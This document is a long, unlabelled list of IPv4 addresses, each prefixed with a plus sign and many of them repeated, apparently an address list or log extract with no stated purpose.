+187.65.41.244 +89.231.198.98 +69.46.7.35 +200.100.80.11 +14.186.126.43 +186.54.222.30 +41.96.76.30 +186.52.154.85 +41.143.26.253 +175.145.109.56 +175.139.247.201 +177.23.94.14 +146.88.64.82 +189.112.244.195 +41.142.67.62 +177.206.140.131 +200.141.174.134 +117.201.18.246 +117.212.185.67 +117.221.1.141 +117.212.185.38 +117.212.184.170 +117.194.137.154 +117.201.6.73 +117.213.37.199 +59.96.228.21 +177.204.39.33 +117.201.24.30 +117.215.183.168 +175.139.211.253 +175.139.224.194 +117.241.219.153 +117.241.219.211 +59.92.102.74 +183.88.214.182 +117.212.179.122 +59.89.192.215 +59.88.190.31 +44.201.0.203 +117.194.129.110 +117.207.76.253 +117.197.200.182 +59.93.165.67 +117.201.17.135 +117.212.181.212 +117.194.136.192 +117.221.240.226 +2.89.106.55 +117.212.178.235 +200.187.169.184 +179.26.107.123 +117.213.78.109 +61.3.252.184 +186.57.126.46 +196.64.158.114 +61.2.37.168 +117.200.146.61 +117.193.242.212 +61.3.203.227 +54.213.167.3 +59.98.59.48 +117.212.189.223 +66.102.231.29 +117.221.11.190 +117.221.11.3 +117.221.10.233 +59.89.195.41 +183.88.214.182 +59.92.177.36 +117.221.10.178 +200.129.129.248 +117.241.41.174 +59.92.237.17 +59.95.161.216 +41.96.43.163 +117.221.233.80 +175.140.73.97 +117.200.156.250 +41.142.67.62 +117.194.131.169 +117.201.8.63 +117.202.67.94 +117.202.139.159 +117.201.24.94 +117.221.246.225 +59.96.52.215 +59.92.82.157 +189.19.143.199 +117.218.121.190 +59.92.18.23 +59.89.236.235 +117.221.13.53 +59.92.121.99 +117.194.138.188 +117.200.153.26 +117.221.3.109 +117.221.3.9 +117.202.143.204 +59.88.180.176 +117.201.18.32 +117.221.6.23 +190.133.248.125 +117.221.11.120 +117.221.241.13 +177.158.3.108 +59.96.224.127 +61.3.245.72 +117.221.15.137 +117.213.35.233 +186.48.6.33 +41.96.57.8 +59.89.194.12 +59.92.18.166 +179.186.137.139 +117.221.14.45 +98.191.62.9 +117.221.11.106 +209.20.65.118 +117.239.0.76 +117.207.70.157 +117.201.29.15 +2.89.106.55 +191.249.121.176 +41.96.43.163 +41.96.57.8 +125.27.187.158 +179.26.209.18 +82.208.158.217 +179.98.137.241 +179.235.253.208 +54.183.253.25 +177.156.70.41 +179.162.207.169 +190.114.244.125 +183.88.214.182 +117.228.149.16 +59.99.211.107 +117.212.178.205 +213.81.173.238 +196.206.157.179 +117.201.21.133 +175.141.26.195 +177.50.190.239 +41.96.70.72 +191.54.229.222 +167.56.72.159 +117.221.241.182 +201.33.207.17 +167.60.238.22 +54.207.169.108 +186.48.250.107 +41.96.192.61 +2.89.103.214 +196.70.30.223 +113.172.68.49 +45.236.240.90 +179.186.67.105 +45.236.240.90 +209.20.65.118 +196.206.157.179 +50.16.46.13 +173.198.41.140 +88.247.25.207 +202.51.64.135 +41.140.140.156 +177.18.255.181 +213.124.108.82 +45.236.240.90 +179.187.253.87 +185.106.243.175 +201.43.27.103 +179.26.59.223 +201.47.181.113 +179.225.161.86 +125.27.184.55 +157.175.172.58 +35.157.192.211 +189.112.244.15 +195.45.74.35 +45.236.240.90 +52.211.139.78 +13.244.102.245 +186.50.146.47 +180.75.10.150 +191.250.13.82 +149.248.7.205 +94.96.8.76 +186.86.49.2 +105.97.3.170 +178.242.14.146 +175.139.226.191 +167.57.152.29 +18.205.249.41 +44.197.124.78 +186.48.126.210 +41.79.124.17 +177.205.121.211 +186.222.38.146 +196.65.92.89 +70.151.12.40 +179.162.190.186 +179.26.211.156 +179.185.142.10 +186.57.75.62 +41.96.163.75 +103.51.74.20 +177.132.210.1 +195.251.13.15 +201.33.206.213 +175.142.114.235 +179.176.114.33 +58.71.194.37 +46.97.17.94 +125.27.195.146 +52.138.140.75 +138.204.93.84 +177.205.47.208 +45.236.240.90 +183.88.214.182 +191.30.1.61 +191.33.5.235 +179.158.237.171 +45.236.240.90 +66.232.104.106 +3.88.132.240 +183.80.198.36 +121.121.89.175 +191.251.51.232 +183.88.214.182 +20.85.44.203 +183.88.214.182 +179.178.202.160 +13.229.34.124 +177.50.169.242 +167.57.200.150 +124.82.84.125 +202.164.44.187 +138.122.166.42 +186.55.178.167 +180.75.8.13 +41.98.0.34 +186.52.125.162 +176.221.109.190 +117.221.3.161 +83.167.195.166 +117.202.70.132 +188.52.35.86 +34.228.118.10 +61.2.217.94 +117.200.145.141 +117.200.152.59 +117.201.10.200 +191.54.165.61 +59.93.165.210 +59.98.57.205 +197.204.233.199 +117.213.69.180 +117.212.191.253 +59.92.180.73 +59.90.86.208 +59.96.230.51 +52.201.142.55 +117.197.195.167 +117.213.106.208 +59.91.155.99 +59.91.159.129 +117.201.10.72 +117.213.36.18 +117.221.3.187 +115.133.51.124 +70.151.12.40 +83.167.195.166 +183.88.39.39 +198.51.63.154 +41.142.85.21 +41.142.85.21 +24.232.3.59 +200.130.3.111 +187.189.235.100 +36.76.126.178 +183.88.214.182 +201.121.173.112 +179.181.192.248 +45.236.240.90 +171.22.25.127 +71.172.1.226 +171.22.25.127 +71.172.1.236 +50.205.159.161 +50.205.159.146 +91.21.253.22 +179.156.190.157 +183.88.59.91 +200.150.108.115 +187.183.215.208 +83.110.99.211 +179.26.225.117 +41.142.81.138 +41.96.69.221 +197.204.238.185 +2.89.70.201 +186.54.241.177 +59.91.18.189 +41.96.171.29 +177.96.148.47 +117.194.139.84 +117.207.69.11 +59.92.95.148 +59.89.198.191 +117.221.7.85 +117.221.238.109 +117.197.204.252 +117.202.69.197 +61.2.37.59 +117.194.131.88 +59.99.210.7 +178.254.100.157 +117.201.24.232 +117.221.13.241 +117.241.42.139 +117.241.42.30 +59.88.181.192 +59.88.179.27 +59.89.193.113 +117.197.198.220 +117.215.181.242 +59.92.18.71 +61.2.75.58 +117.194.129.234 +117.197.200.26 +117.200.145.68 +186.52.167.4 +186.57.101.75 +117.201.2.212 +117.212.191.52 +117.212.189.38 +59.91.147.113 +117.201.16.35 +117.194.136.67 +59.96.228.174 +186.48.136.87 +117.221.14.151 +117.221.13.230 +59.96.54.123 +117.201.2.111 +61.2.35.39 +117.201.23.221 +117.221.12.18 +186.54.241.177 +117.241.217.26 +117.194.143.86 +117.194.143.105 +117.194.132.208 +117.212.177.174 +117.200.156.170 +117.241.43.75 +59.92.84.227 +177.133.16.115 +117.221.13.194 +117.200.159.191 +59.89.206.232 +61.3.245.144 +117.202.0.157 +41.96.69.221 +117.212.184.158 +117.221.11.130 +59.96.171.254 +117.241.43.37 +59.91.151.95 +59.93.165.206 +59.96.55.14 +117.200.153.223 +117.212.178.212 +117.215.180.131 +117.213.66.226 +117.201.21.98 +59.92.178.29 +167.57.220.199 +94.96.23.141 +117.217.214.129 +117.194.132.231 +61.2.217.5 +175.139.40.26 +189.81.25.45 +200.232.197.216 +183.88.214.182 +115.133.208.227 +183.88.214.182 +2.89.90.196 +186.52.225.113 +186.54.80.138 +59.96.226.163 +195.88.204.13 +41.96.27.209 +59.92.191.182 +197.204.239.221 +190.133.249.243 +117.201.18.206 +41.143.19.141 +186.18.233.113 +117.217.188.113 +94.96.38.109 +59.96.52.80 +117.213.67.148 +196.65.239.121 +117.201.19.246 +117.194.136.44 +23.88.49.222 +175.139.40.7 +117.201.23.58 +117.212.180.86 +117.201.22.225 +179.162.199.67 +195.88.205.13 +117.241.217.199 +66.232.104.106 +41.142.239.142 +177.97.54.233 +186.214.141.204 +183.88.214.182 +209.40.197.71 +59.98.59.218 +64.79.217.104 +209.59.202.86 +189.59.46.121 +209.40.198.72 +209.40.192.142 +67.223.224.13 +175.144.53.137 +62.94.56.23 +209.40.197.53 +54.174.184.54 +54.183.169.223 +45.236.240.90 +209.40.193.144 +177.159.222.44 +177.197.110.70 +209.239.99.81 +41.140.185.202 +180.183.124.17 +99.193.245.231 +175.141.149.41 +66.232.104.106 +217.115.219.138 +219.92.27.157 +45.236.240.90 +189.61.125.28 +189.58.145.31 +179.191.239.188 +181.60.245.161 +121.121.102.241 +41.96.90.185 +179.24.224.208 +105.102.221.53 +200.121.78.10 +189.27.119.252 +52.221.200.15 +201.217.151.138 +189.154.105.79 +175.145.110.134 +183.88.214.182 +167.60.253.40 +201.217.151.142 +117.217.185.198 +59.92.239.115 +59.96.228.193 +59.95.163.148 +117.221.12.6 +177.133.13.69 +117.241.217.128 +201.217.151.140 +179.24.197.89 +105.97.100.135 +78.30.57.57 +117.194.136.111 +117.213.109.161 +117.223.35.72 +117.221.10.123 +59.99.103.207 +117.221.241.56 +59.92.82.205 +177.34.245.4 +59.92.83.29 +117.221.9.136 +117.207.72.112 +117.207.72.165 +187.181.129.216 +189.62.167.76 +117.200.147.54 +117.193.241.100 +117.221.11.113 +117.221.10.236 +117.201.3.168 +123.201.101.108 +117.213.76.60 +117.200.157.227 +117.207.76.71 +117.221.10.219 +59.91.146.140 +117.201.19.111 +13.245.255.39 +201.217.151.139 +117.197.201.182 +167.60.74.190 +179.222.120.194 +117.213.37.133 +59.91.159.153 +105.158.183.72 +117.207.77.116 +41.96.63.219 +59.91.147.145 +186.214.129.133 +59.91.157.121 +59.92.84.222 +117.202.188.107 +177.18.190.79 +186.50.99.168 +117.201.18.86 +177.138.112.156 +186.57.117.14 +201.217.151.141 +117.221.6.113 +186.55.9.208 +41.96.90.185 +41.98.127.227 +183.88.214.182 +45.236.240.90 +179.219.69.31 +74.62.126.66 +13.208.110.102 +177.92.34.138 +187.1.89.33 +160.177.154.148 +117.212.181.213 +201.29.91.255 +67.223.230.14 +183.88.214.182 +190.119.182.152 +212.77.176.34 +179.95.230.144 +45.236.240.90 +183.88.214.182 +45.236.240.90 +183.88.214.182 +45.236.240.90 +183.88.214.182 +45.236.240.90 +41.142.79.184 +45.236.240.90 +45.236.240.90 +45.236.240.90 +177.35.89.145 +183.88.214.182 +45.236.240.90 +45.236.240.90 +183.88.214.182 +171.22.25.127 +45.236.240.90 +189.61.125.132 +191.31.17.121 +66.232.104.106 +45.236.240.90 +45.236.240.90 +179.67.94.143 +200.163.147.19 +183.88.214.182 +45.236.240.90 +183.88.214.182 +183.88.214.182 +45.236.240.90 +114.143.155.138 +98.174.83.162 +183.88.214.182 +183.88.214.182 +183.88.214.182 +191.54.58.164 +117.199.136.235 +45.236.240.90 +182.72.92.162 +66.232.104.106 +35.182.218.155 +191.185.39.168 +18.235.4.50 +34.248.133.152 +187.32.176.121 +186.210.95.136 +189.112.54.94 +177.205.123.175 +177.94.98.132 +13.126.97.82 +189.231.109.16 +177.69.52.70 +54.216.60.36 +186.223.228.206 +41.103.226.7 +186.49.15.170 +105.158.244.163 +189.112.182.120 +49.12.229.46 +78.30.58.126 +179.26.70.189 +187.28.101.33 +105.102.136.182 +117.218.46.141 +34.248.133.152 +189.112.48.14 +177.191.48.133 +54.216.60.36 +187.113.27.167 +183.88.214.182 +186.57.127.191 +201.28.177.58 +177.191.248.121 +45.236.240.90 +219.92.154.136 +219.254.32.150 +196.64.64.162 +117.218.46.141 +99.79.122.172 +189.38.242.201 +168.228.181.61 +61.0.233.187 +195.57.11.18 +189.211.188.170 +191.13.110.168 +45.236.240.90 +13.236.1.19 +191.220.1.62 +177.137.237.170 +177.45.175.89 +197.204.131.80 +79.131.185.61 +190.133.0.20 +189.49.217.169 +41.96.89.199 +177.50.163.90 +187.21.151.136 +177.30.97.77 +213.212.201.53 +190.193.249.158 +41.96.201.72 +41.33.222.132 +167.63.99.31 +59.92.117.254 +179.176.109.242 +177.205.113.160 +177.43.88.146 +200.123.187.203 +186.50.110.220 +219.92.154.162 +41.33.222.130 +191.176.208.36 +175.140.72.45 +177.207.87.132 +180.245.32.14 +103.228.35.252 +45.236.240.90 +183.88.214.182 +89.143.244.106 +183.87.203.85 +187.65.156.160 +41.140.190.237 +157.175.56.248 +191.250.53.181 +200.187.168.52 +121.123.55.227 +177.96.64.86 +52.66.91.166 +152.249.127.152 +201.42.114.35 +177.188.247.124 +189.112.92.6 +190.113.60.6 +200.123.187.203 +177.188.254.245 +191.251.47.32 +186.49.69.107 +13.245.30.25 +177.235.20.23 +115.133.72.76 +45.236.240.90 +189.112.150.205 +179.26.43.223 +66.232.104.106 +187.180.93.94 +177.157.92.200 +191.31.28.59 +187.56.86.114 +189.28.166.52 +45.236.240.90 +200.33.152.238 +117.194.133.185 +186.210.30.92 +157.164.189.165 +182.18.140.194 +200.187.162.207 +179.152.34.251 +179.152.34.251 +185.17.196.196 +170.81.191.242 +187.39.30.220 +183.88.214.182 +45.236.240.90 +117.200.149.251 +177.206.199.203 +45.236.240.90 +41.67.137.50 +182.18.140.196 +45.236.240.90 +201.95.48.66 +219.254.32.150 +183.88.61.9 +105.159.184.121 +185.17.196.196 +3.209.138.236 +200.1.115.100 +202.152.23.73 +189.79.76.83 +196.217.57.64 +191.252.197.86 +180.75.11.118 +105.159.184.121 +179.83.142.74 +179.100.24.227 +179.186.41.18 +201.48.102.220 +186.210.86.109 +179.179.136.54 +66.232.104.106 +177.207.225.111 +15.152.39.21 +189.27.125.79 +59.92.94.23 +117.254.64.90 +3.235.231.16 +54.166.99.28 +189.46.142.250 +177.100.203.53 +177.191.45.79 +187.108.204.57 +177.159.136.40 +45.236.240.90 +52.15.107.0 +41.142.87.120 +191.251.29.20 +186.210.89.104 +189.61.124.13 +217.238.186.134 +66.232.104.106 +160.176.233.86 +88.4.155.238 +167.56.76.155 +52.62.19.2 +83.99.49.202 +125.27.231.34 +191.33.12.39 +189.89.168.162 +179.84.100.99 +60.50.171.105 +125.63.86.66 +183.88.214.182 +45.236.240.90 +187.64.129.236 +189.26.169.6 +177.157.126.224 +45.236.240.90 +177.206.82.237 +105.157.121.20 +66.42.140.110 +183.88.214.182 +59.88.186.102 +183.88.214.182 +166.78.243.82 +177.1.129.9 +83.4.90.33 +24.101.151.220 +186.223.228.206 +177.62.94.124 +201.86.164.73 +3.26.32.115 +189.46.193.208 +59.96.52.229 +189.91.227.69 +179.219.42.8 +191.251.120.66 +187.114.184.187 +185.106.240.79 +185.106.240.78 +191.253.110.68 +201.92.41.219 +105.102.241.210 +83.15.109.58 +166.78.243.82 +189.26.138.173 +117.216.9.59 +179.181.88.163 +141.164.43.243 +177.17.80.157 +200.233.227.205 +183.88.214.182 +191.13.162.201 +37.252.123.143 +187.19.165.125 +187.74.127.119 +179.182.12.6 +200.121.78.10 +185.200.165.29 +189.59.214.102 +190.113.60.6 +179.209.81.5 +201.86.50.186 +191.33.233.201 +177.138.27.123 +191.191.99.142 +177.205.111.184 +179.95.92.106 +191.55.195.218 +79.217.93.42 +177.107.191.146 +160.179.86.102 +189.68.140.83 +189.26.221.203 +117.213.69.149 +103.251.43.153 +117.218.92.16 +200.19.222.18 +187.113.24.246 +219.254.32.150 +5.249.128.21 +41.96.218.254 +91.61.80.7 +198.51.63.161 +203.223.190.109 +15.185.250.249 +186.49.9.236 +201.95.125.79 +34.204.185.107 +13.214.137.126 +201.19.223.39 +105.154.116.20 +3.14.126.14 +182.93.85.239 +191.31.28.176 +183.88.214.182 +52.11.119.164 +170.83.162.129 +179.251.153.199 +18.231.190.253 +18.170.43.96 +179.154.241.138 +59.89.237.192 +189.59.51.166 +117.212.190.89 +183.88.214.182 +34.204.185.107 +177.17.184.235 +52.12.4.8 +59.92.92.33 +207.210.233.92 +98.153.115.222 +66.232.104.106 +59.99.226.144 +18.141.206.167 +34.243.134.8 +187.65.9.162 +179.187.240.195 +201.121.211.149 +189.115.57.130 +189.26.129.242 +118.200.42.249 +45.236.240.90 +191.31.28.57 +45.236.240.90 +189.90.54.179 +179.127.87.107 +173.68.146.20 +188.50.254.255 +3.231.59.36 +102.53.51.131 +117.217.181.33 +109.167.231.226 +117.197.203.118 +78.189.17.110 +85.105.246.243 +190.139.39.2 +186.215.70.250 +189.231.125.36 +191.19.193.73 +18.195.214.128 +179.95.197.233 +14.186.126.5 +20.75.45.249 +179.107.34.26 +185.17.196.195 +137.103.44.60 +200.187.60.109 +200.5.239.218 +200.54.71.117 +200.139.16.33 +191.187.121.87 +45.236.240.90 +187.74.255.154 +177.42.48.12 +179.152.38.56 +191.31.105.22 +115.133.72.106 +183.88.214.182 +177.96.210.172 +43.224.139.174 +180.92.162.35 +179.222.122.193 +59.91.156.23 +187.64.129.236 +59.99.100.48 +117.221.12.31 +117.221.12.15 +117.221.11.213 +185.17.196.195 +117.241.217.139 +59.91.152.95 +173.68.146.20 +117.201.21.147 +189.112.244.199 +61.2.37.55 +202.149.208.20 +118.69.218.81 +118.69.218.81 +41.96.91.12 +3.97.55.102 +167.61.254.210 +160.177.153.41 +175.145.112.22 +179.181.72.122 +175.136.213.118 +160.176.195.174 +103.148.156.254 +186.48.69.249 +201.27.214.186 +179.183.186.181 +170.84.53.166 +51.161.106.51 +177.158.21.197 +54.248.20.7 +181.89.132.55 +190.133.3.18 +52.203.98.221 +191.31.24.119 +196.64.72.196 +52.70.205.35 +179.176.115.141 +189.154.123.46 +181.99.85.175 +175.143.61.112 +181.119.52.82 +219.92.27.157 +175.139.225.211 +78.189.17.110 +196.217.56.4 +177.159.244.145 +177.18.189.118 +59.99.223.9 +177.30.95.115 +88.132.228.143 +177.98.242.234 +179.24.193.252 +179.187.9.9 +196.77.100.189 +191.34.101.219 +177.50.173.114 +189.18.102.191 +189.59.181.143 +186.210.28.148 +186.57.111.78 +179.24.200.93 +196.92.146.189 +2.89.96.85 +41.96.234.245 +117.221.7.144 +117.241.40.149 +70.151.12.34 +117.194.139.61 +59.92.80.114 +117.221.241.171 +117.221.13.127 +177.159.130.25 +177.144.157.13 +186.212.70.193 +45.236.240.90 +183.88.214.182 +213.171.214.189 +187.59.106.175 +177.43.152.184 +59.89.239.235 +117.217.187.27 +117.201.20.90 +117.213.38.79 +117.221.8.112 +59.92.116.179 +117.200.144.115 +59.92.96.117 +117.241.40.80 +59.96.225.80 +117.200.154.72 +117.212.177.124 +117.217.189.67 +117.213.105.210 +177.97.186.175 +177.45.173.243 +41.96.204.87 +103.228.19.175 +186.50.79.138 +45.236.240.90 +168.235.128.106 +201.42.113.98 +41.96.26.145 +177.159.130.14 +181.81.134.124 +183.88.214.182 +157.90.114.36 +186.214.65.34 +41.251.172.59 +191.35.213.149 +81.12.221.45 +191.54.62.23 +35.182.245.98 +121.122.124.163 +41.97.155.4 +187.121.77.243 +117.212.191.154 +59.89.195.225 +59.96.226.124 +117.200.147.45 +117.212.185.3 +177.134.107.65 +52.200.101.95 +183.88.35.217 +117.212.180.54 +15.185.34.79 +59.91.145.6 +59.99.222.28 +191.54.59.240 +117.207.66.1 +117.221.12.149 +59.88.186.1 +186.52.170.66 +188.52.21.53 +177.132.231.127 +124.82.51.19 +117.202.41.170 +78.30.56.43 +117.212.183.211 +117.221.244.212 +117.221.12.238 +59.92.176.249 +179.158.228.64 +41.96.237.102 +179.214.19.197 +41.96.237.102 +186.57.65.61 +41.142.69.209 +61.3.243.143 +110.139.95.187 +188.19.13.70 +117.221.7.1 +179.181.155.209 +177.134.32.215 +80.190.64.221 +175.139.245.91 +179.178.197.154 +194.225.148.32 +186.113.7.94 +177.27.212.114 +177.52.212.191 +201.93.236.5 +189.114.247.0 +117.221.14.160 +117.201.16.221 +180.183.129.5 +202.62.224.180 +117.221.7.158 +117.212.185.192 +61.2.32.162 +117.213.36.100 +41.96.48.107 +186.210.27.52 +117.217.213.165 +201.48.182.217 +186.66.16.18 +117.206.128.158 +35.183.15.177 +190.244.157.11 +179.95.114.252 +177.221.40.134 +190.122.164.74 +179.183.184.147 +183.88.214.182 +195.175.45.18 +186.52.211.148 +177.204.33.184 +80.53.252.100 +65.249.131.126 +13.229.146.56 +13.38.6.99 +65.249.131.126 +191.31.18.109 +189.27.29.201 +217.125.149.127 +47.21.22.164 +59.92.82.163 +117.221.3.212 +117.201.21.100 +117.241.41.203 +59.92.94.129 +59.92.80.169 +201.48.117.50 +117.201.7.198 +117.215.183.3 +117.215.183.30 +117.221.14.216 +200.146.247.187 +117.221.15.15 +117.213.39.183 +177.132.250.118 +177.206.169.119 +18.7.27.213 +175.139.225.50 +186.50.94.123 +190.221.18.146 +41.140.184.195 +200.146.249.86 +172.105.17.167 +179.105.211.203 +187.39.19.165 +186.222.20.38 +167.56.78.75 +180.74.240.104 +190.221.18.146 +191.250.51.172 +179.105.214.232 +187.114.29.228 +177.159.72.114 +187.255.130.144 +45.179.75.197 +177.189.190.127 +94.230.19.50 +196.70.216.127 +187.32.91.33 +45.236.240.90 +138.36.99.123 +199.166.6.189 +34.252.105.67 +164.52.208.234 +187.32.91.35 +160.177.157.52 +186.52.179.236 +179.233.218.232 +45.184.68.139 +45.236.240.90 +186.57.112.132 +177.95.37.123 +189.18.102.233 +189.154.4.116 +175.139.40.2 +201.103.70.226 +59.92.94.143 +41.142.80.134 +59.99.220.247 +117.241.42.28 +117.217.178.14 +117.197.207.134 +117.221.240.183 +117.241.70.4 +59.99.102.255 +5.26.170.128 +179.187.255.228 +117.221.240.120 +179.26.78.44 +45.236.240.90 +179.222.122.42 +2.89.91.178 +41.96.41.18 +177.35.16.170 +177.50.190.33 +191.55.199.129 +191.55.199.166 +34.245.147.39 +117.201.19.179 +45.171.46.10 +62.216.237.47 +207.112.107.200 +187.112.82.172 +207.112.107.202 +191.35.249.19 +179.26.65.52 +13.51.178.78 +183.88.214.182 +181.81.154.115 +191.54.132.124 +54.219.130.171 +42.189.17.213 +189.110.247.85 +175.140.162.14 +179.83.42.132 +177.193.185.216 +186.214.216.113 +121.123.72.167 +219.92.154.233 +189.6.145.17 +200.140.42.143 +181.80.78.99 +191.54.56.147 +189.61.121.11 +186.57.107.164 +177.191.57.165 +102.53.60.128 +109.239.58.126 +105.157.131.254 +191.250.216.109 +45.236.240.90 +186.210.87.119 +103.237.147.110 +187.57.247.198 +13.229.34.124 +183.88.214.182 +179.233.220.10 +187.65.177.62 +191.55.194.141 +183.88.214.182 +196.206.170.53 +201.0.116.58 +187.72.242.48 +189.41.242.38 +200.158.194.79 +189.91.227.28 +189.115.152.29 +186.212.40.209 +179.95.107.56 +179.83.53.109 +179.184.198.139 +115.134.194.123 +177.107.191.146 +219.95.156.247 +177.17.243.120 +175.139.40.103 +196.92.138.7 +196.92.138.7 +177.102.173.75 +54.206.50.229 +177.189.191.12 +189.114.1.154 +191.17.29.100 +191.54.81.76 +45.236.240.90 +201.9.90.30 +191.31.28.232 +78.30.52.242 +194.27.81.46 +191.35.89.233 +181.81.151.214 +191.248.122.53 +189.68.194.55 +179.217.39.76 +113.193.10.224 +179.105.221.99 +186.210.83.2 +117.213.38.97 +187.116.64.94 +181.171.104.125 +115.133.48.155 +186.250.92.156 +160.179.83.177 +177.96.160.149 +45.236.240.90 +201.184.86.178 +177.156.160.140 +45.236.240.90 +219.92.18.145 +179.191.239.115 +189.68.232.84 +121.122.122.14 +189.112.72.60 +186.214.218.192 +177.50.165.235 +181.213.36.102 +186.206.154.193 +187.180.123.187 +179.108.179.189 +187.58.35.222 +45.236.240.90 +177.16.203.74 +194.176.109.161 +195.201.75.127 +196.64.70.252 +200.146.248.32 +189.63.134.79 +150.230.67.41 +91.224.13.207 +183.88.214.182 +45.160.27.90 +83.167.42.150 +118.185.75.243 +103.51.74.24 +194.176.109.161 +194.176.109.167 +187.21.228.71 +186.208.253.141 +14.192.239.119 +194.27.81.46 +200.71.26.122 +175.142.62.48 +82.124.7.202 +200.201.189.148 +189.231.125.112 +189.154.23.46 +167.57.216.207 +179.228.93.83 +177.188.47.117 +181.24.128.215 +189.63.134.79 +177.157.65.124 +47.33.81.160 +200.155.126.218 +179.225.179.148 +45.236.240.90 +86.98.28.44 +143.244.114.151 +51.103.161.162 +186.86.49.200 +203.47.138.130 +183.88.214.182 +64.129.215.75 +64.129.215.74 +187.35.54.220 +179.26.146.141 +189.63.134.210 +179.186.138.252 +91.192.174.30 +201.40.25.113 +179.222.120.27 +117.241.216.18 +59.91.151.33 +177.50.172.124 +177.42.53.91 +64.129.215.73 +177.2.67.108 +191.205.124.15 +189.83.151.114 +95.61.31.250 +189.59.180.136 +179.93.232.38 +54.252.215.139 +83.110.98.93 +200.128.85.180 +45.160.27.90 +200.128.85.178 +200.128.85.179 +45.236.240.90 +202.62.224.180 +189.47.16.238 +110.173.177.247 +18.138.225.192 +177.207.18.42 +13.127.26.66 +13.126.241.236 +168.228.181.69 +41.96.58.174 +175.140.20.20 +179.83.41.215 +187.112.50.60 +191.31.1.213 +152.249.124.131 +186.207.88.209 +177.144.161.139 +183.88.214.182 +186.213.223.34 +65.0.180.205 +201.25.157.186 +189.20.200.98 +182.52.191.184 +66.232.104.106 +177.205.114.227 +103.144.61.54 +182.18.140.193 +181.89.134.187 +189.15.206.112 +218.111.229.88 +202.62.224.25 +45.236.240.90 +117.215.183.220 +186.210.31.106 +179.162.203.108 +183.88.214.182 +187.65.73.59 +20.75.4.201 +191.54.58.213 +54.154.252.133 +41.96.90.22 +191.254.7.108 +179.235.253.228 +177.139.81.62 +191.33.80.123 +177.17.134.237 +177.157.85.159 +191.13.180.114 +203.151.206.118 +118.101.24.199 +176.57.150.45 +93.62.252.55 +117.221.237.42 +179.180.12.7 +179.162.234.255 +186.229.183.189 +179.250.233.36 +187.7.74.6 +187.180.2.70 +177.74.79.213 +191.54.81.180 +103.95.13.183 +80.190.65.1 +41.96.35.168 +115.130.151.239 +45.236.240.90 +203.151.206.142 +146.12.194.35 +187.67.254.103 +146.12.193.27 +93.62.252.55 +200.185.231.99 +186.218.192.128 +187.113.35.42 +196.206.153.69 +191.35.132.248 +196.206.153.69 +81.215.63.123 +45.179.74.204 +41.142.80.148 +3.26.131.116 +189.32.144.33 +179.251.155.244 +177.42.114.168 +201.184.86.178 +45.160.26.178 +177.106.62.194 +175.145.88.10 +175.138.140.73 +124.13.155.155 +138.201.0.107 +189.58.165.196 +201.47.163.54 +179.95.83.165 +189.5.131.226 +189.5.146.74 +121.6.102.16 +191.19.149.211 +187.121.100.153 +66.232.104.106 +189.27.238.171 +200.186.56.195 +123.63.196.186 +177.94.85.178 +183.88.214.182 +187.32.188.204 +189.78.83.37 +45.236.240.90 +191.185.61.90 +83.110.98.45 +152.249.68.19 +121.122.124.161 +186.210.27.99 +41.96.229.211 +82.124.7.202 +66.146.127.4 +201.69.125.115 +12.10.25.13 +175.145.80.121 +93.62.252.55 +191.54.59.75 +66.146.127.4 +66.146.127.19 +211.24.85.145 +177.134.209.222 +191.250.1.162 +81.18.99.51 +66.146.127.19 +189.68.157.160 +45.236.240.90 +186.57.104.99 +179.178.122.167 +179.187.107.29 +189.27.220.56 +45.236.240.90 +59.93.162.144 +117.222.158.40 +187.64.142.230 +183.80.82.104 +115.131.14.235 +189.4.170.180 +140.82.199.96 +189.63.134.210 +168.228.181.90 +196.77.164.154 +175.138.88.30 +118.200.140.123 +195.57.11.18 +41.96.195.34 +83.150.39.131 +187.64.142.230 +179.95.169.189 +66.146.127.5 +177.50.185.124 +37.235.91.59 +189.26.165.231 +187.64.130.89 +171.22.25.127 +186.214.216.12 +200.146.198.75 +152.254.238.15 +186.241.215.248 +191.191.68.79 +45.236.240.90 +45.236.240.90 +187.183.223.216 +189.59.9.107 +191.54.129.243 +59.91.145.211 +107.22.63.139 +45.236.240.90 +177.98.168.23 +59.90.87.69 +191.34.109.215 +66.146.127.19 +183.88.214.182 +117.217.188.34 +177.96.163.64 +58.71.194.21 +177.52.212.181 +183.88.214.182 +189.206.226.10 +117.216.8.142 +191.250.208.163 +187.141.226.46 +175.139.210.235 +179.176.106.10 +177.62.181.119 +217.119.180.117 +45.236.240.90 +186.206.173.248 +95.49.142.51 +179.219.49.182 +45.179.72.244 +45.164.5.28 +177.18.18.235 +45.236.240.90 +209.235.239.137 +209.235.239.138 +83.4.102.209 +107.23.201.197 +186.49.41.227 +179.219.34.198 +45.236.240.90 +186.229.181.95 +177.97.23.130 +196.89.163.97 +2.50.168.196 +66.146.127.5 +177.221.240.92 +189.5.124.223 +61.3.195.129 +179.83.17.74 +177.22.36.233 +194.176.109.187 +124.120.86.24 +187.188.108.200 +177.42.117.38 +3.36.69.125 +209.235.239.138 +189.41.200.250 +177.21.12.33 +177.138.236.31 +183.88.214.182 +191.254.195.92 +66.146.127.4 +66.146.127.5 +177.16.96.21 +128.134.37.56 +182.160.26.133 +117.200.149.190 +196.89.178.125 +175.139.208.194 +42.189.38.104 +182.18.140.197 +117.217.177.108 +175.139.226.254 +202.62.224.25 +1.23.144.186 +180.180.194.60 +103.139.166.12 +183.88.214.182 +183.88.214.182 +219.92.24.65 +210.195.163.60 +183.88.214.182 +177.157.68.246 +117.221.11.21 +180.183.133.39 +115.133.86.10 +88.132.233.145 +201.95.193.173 +117.216.8.89 +59.92.192.99 +175.143.62.1 +59.91.151.88 +121.122.122.96 +59.92.108.243 +117.215.116.91 +124.13.239.193 +175.139.246.236 +117.197.206.66 +117.197.207.143 +117.221.240.173 +59.91.150.82 +117.200.150.55 +59.89.237.6 +61.0.120.88 +117.212.182.210 +117.241.40.209 +59.88.189.95 +223.30.224.242 +59.92.186.225 +117.216.44.156 +61.0.124.11 +59.91.145.225 +177.207.149.195 +117.212.186.203 +61.0.121.3 +117.217.166.115 +164.100.72.35 +179.83.19.205 +180.180.192.48 +189.61.126.164 +201.16.185.25 +191.54.62.154 +189.91.229.5 +72.249.184.251 +177.158.201.34 +186.57.120.118 +185.66.153.63 +179.251.149.251 +128.134.37.57 +189.26.237.109 +195.62.178.95 +160.179.87.144 +203.43.99.43 +20.85.19.122 +59.91.19.162 +179.159.148.10 +177.148.187.154 +177.195.249.208 +187.64.23.92 +179.182.10.2 +200.233.226.48 +115.131.28.201 +124.13.134.129 +168.228.182.125 +191.251.28.164 +177.63.208.24 